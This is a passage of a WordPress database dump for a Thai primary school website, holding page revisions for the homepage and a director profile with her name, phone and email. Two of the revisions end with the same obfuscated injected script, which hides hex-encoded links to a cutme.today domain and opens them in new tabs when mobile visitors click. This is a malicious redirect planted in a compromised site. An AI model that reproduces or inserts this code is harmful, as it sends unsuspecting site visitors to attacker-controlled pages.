src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/Yellow-Clean-Contact-Us-Instagram-Post.png\" alt=\"\" class=\"wp-image-686\" style=\"aspect-ratio:1;object-fit:cover;width:auto;height:500px\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"6e95d8cb\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-6e95d8cb gb-headline-text\"><strong>ติดตามเราได้ที่</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:html -->\n<iframe src=\"https://www.facebook.com/plugins/page.php?href=https%3A%2F%2Fwww.facebook.com%2FbannongpakhaengSchool%3Flocale%3Dth_TH&tabs=timeline&width=330&height=50&small_header=true&adapt_container_width=true&hide_cover=true&show_facepile=true&appId\" width=\"330\" height=\"80\" style=\"border:none;overflow:hidden\" scrolling=\"no\" frameborder=\"0\" allowfullscreen=\"true\" allow=\"autoplay; clipboard-write; encrypted-media; picture-in-picture; web-share\"></iframe>\n<!-- /wp:html -->\n\n<!-- wp:shortcode -->\n[post-views]\n<!-- /wp:shortcode -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"fc945863\",\"isGrid\":true,\"gridId\":\"73d9ffe7\",\"width\":50,\"widthMobile\":100,\"isDynamic\":true,\"blockVersion\":4} /-->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container --></div></div>\n<!-- /wp:kadence/column -->\n<!-- /wp:kadence/rowlayout -->\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script>','หน้าแรก','','inherit','closed','closed','','14-revision-v1','','','2024-08-08 14:20:24','2024-08-08 07:20:24','',14,'http://pakhaeng.ssk.in.th/?p=688',0,'revision','',0),
(690,1,'2024-08-08 14:23:20','2024-08-08 07:23:20','','ผอ-1','','inherit','','closed','','%e0%b8%9c%e0%b8%ad-1-4','','','2024-08-08 14:23:20','2024-08-08 07:23:20','',469,'http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ผอ-1-2.png',0,'attachment','image/png',0),
(691,1,'2024-08-08 14:29:51','2024-08-08 07:29:51','<!-- wp:paragraph -->\n<p></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:columns -->\n<div class=\"wp-block-columns\"><!-- wp:column -->\n<div class=\"wp-block-column\"><!-- wp:image {\"id\":690,\"sizeSlug\":\"full\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-full\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ผอ-1-2.png\" alt=\"\" class=\"wp-image-690\"/></figure>\n<!-- /wp:image --></div>\n<!-- /wp:column -->\n\n<!-- wp:column -->\n<div class=\"wp-block-column\"><!-- wp:generateblocks/headline {\"uniqueId\":\"cbd5a9a5\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"30px\"},\"backgroundColor\":\"#f78da7\",\"textColor\":\"#ffffff\",\"highlightTextColor\":\"#7bdcb5\",\"iconColor\":\"#fcb900\"} -->\n<h2 class=\"gb-headline gb-headline-cbd5a9a5 gb-headline-text\">ข้อมูลผู้บริหารสถานศึกษา</h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:paragraph -->\n<p><strong>ชื่อ-สกุล : </strong>นางเสน่หา  พลโสภา</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p><strong>ตำแหน่ง</strong> ผู้อำนวยการโรงเรียนบ้านหนองปลาเข็ง กอไหล่</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p><strong>โทรศัพท์</strong> :  093-325-2659</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p><strong>E-mail</strong> : phonsopha2509@gmail.com</p>\n<!-- /wp:paragraph --></div>\n<!-- /wp:column --></div>\n<!-- /wp:columns -->\n\n<!-- wp:shortcode -->\n[tmm name=\"%e0%b8%82%e0%b9%89%e0%b8%ad%e0%b8%a1%e0%b8%b9%e0%b8%a5%e0%b8%9c%e0%b8%b9%e0%b9%89%e0%b8%9a%e0%b8%a3%e0%b8%b4%e0%b8%ab%e0%b8%b2%e0%b8%a3%e0%b8%aa%e0%b8%96%e0%b8%b2%e0%b8%99%e0%b8%a8%e0%b8%b6%e0%b8%81\"]\n<!-- /wp:shortcode -->\n\n<!-- wp:paragraph -->\n<p></p>\n<!-- /wp:paragraph -->\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script>','ข้อมูลผู้บริหาร','','inherit','closed','closed','','469-revision-v1','','','2024-08-08 14:29:51','2024-08-08 07:29:51','',469,'http://pakhaeng.ssk.in.th/?p=691',0,'revision','',0),
(692,1,'2024-08-08 14:30:25','2024-08-08 07:30:25','<!-- wp:paragraph -->\n<p></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:columns -->\n<div class=\"wp-block-columns\"><!-- wp:column -->\n<div class=\"wp-block-column\"><!-- wp:image {\"id\":690,\"sizeSlug\":\"full\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-full\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ผอ-1-2.png\" alt=\"\" class=\"wp-image-690\"/></figure>\n<!-- /wp:image --></div>\n<!-- /wp:column -->\n\n<!-- wp:column -->\n<div class=\"wp-block-column\"><!-- wp:generateblocks/headline {\"uniqueId\":\"cbd5a9a5\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"30px\"},\"backgroundColor\":\"#f78da7\",\"textColor\":\"#ffffff\",\"highlightTextColor\":\"#7bdcb5\",\"iconColor\":\"#fcb900\"} -->\n<h2 class=\"gb-headline gb-headline-cbd5a9a5 gb-headline-text\">ผู้บริหารสถานศึกษา</h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:paragraph -->\n<p><strong>ชื่อ-สกุล : </strong>นางเสน่หา  พลโสภา</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p><strong>ตำแหน่ง</strong> ผู้อำนวยการโรงเรียนบ้านหนองปลาเข็ง กอไหล่</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p><strong>โทรศัพท์</strong> :  093-325-2659</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p><strong>E-mail</strong> : phonsopha2509@gmail.com</p>\n<!-- /wp:paragraph --></div>\n<!-- /wp:column --></div>\n<!-- /wp:columns -->\n\n<!-- wp:shortcode -->\n[tmm name=\"%e0%b8%82%e0%b9%89%e0%b8%ad%e0%b8%a1%e0%b8%b9%e0%b8%a5%e0%b8%9c%e0%b8%b9%e0%b9%89%e0%b8%9a%e0%b8%a3%e0%b8%b4%e0%b8%ab%e0%b8%b2%e0%b8%a3%e0%b8%aa%e0%b8%96%e0%b8%b2%e0%b8%99%e0%b8%a8%e0%b8%b6%e0%b8%81\"]\n<!-- /wp:shortcode -->\n\n<!-- wp:paragraph -->\n<p></p>\n<!-- /wp:paragraph 